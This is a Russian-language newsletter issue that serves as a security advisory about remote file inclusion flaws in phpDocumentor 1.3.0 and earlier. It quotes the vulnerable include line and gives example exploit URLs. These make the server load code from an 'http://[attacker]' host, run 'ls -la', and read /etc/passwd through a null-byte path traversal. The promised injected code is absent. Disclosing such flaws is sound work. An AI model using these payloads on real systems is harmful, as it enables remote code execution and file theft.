Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в phpDocumentor.


Информационный Канал Subscribe.Ru

Компьютер для продвинутых пользователей
Содержание:
PhpDocumentor
ПО: PhpDocumentor
Версия: <= 1.3.0

Описание:
PhpDocumentor, или по другому phpdoc. Является стандартным инструментом для php языка. Может быть использован для создания профессиональной документации от php исходного текста.
Уязвимость:
1) Уязвимый код в Documentation/tests/bug-559668.php линия 4:
....
require_once $FORUM['LIB'] . '/classes/db/PearDb.php';
....
Пример:
http://[target]/[path_to_phpdocumentor]/Documentation/tests/bug-559668.php?cmd=ls%20-la&FORUM[LIB]=http://[attacker]
где в http://[attacker]/classes/db/PearDb.php/index.html
вы должны вставить код:

Либо:
http://[target]/[path_to_phpdocumentor]/Documentation/tests/bug-559668.php?FORUM[LIB]=http://[attacker]/script.txt%00
http://[target]/[path_to_phpdocumentor]/Documentation/tests/bug-559668.php?FORUM[LIB]=../../../../../../../etc/passwd%00
2) Уязвимсоть в docbuilder/file_dialog.php линии 49-56:
Пример:
http://[target]/[path_to_phpdocumentor]/docbuilder/file_dialog.php?cmd=ls%20-la&root_dir=http://[attacker]
где в http://[attacker]/phpDocumentor/common.inc.php/index.html необходимо подставить некоторый код.
PhpDocumentor
Рассылка создана и ведется при поддержке Информационной сети Пермского края.

Subscribe.Ru
Поддержка подписчиков
Другие рассылки этой тематики
Другие рассылки этого автора
Подписан адрес:
Код этой рассылки: comp.paper.supuser
Архив рассылки
Отписаться Вебом Почтой
Вспомнить пароль

В избранное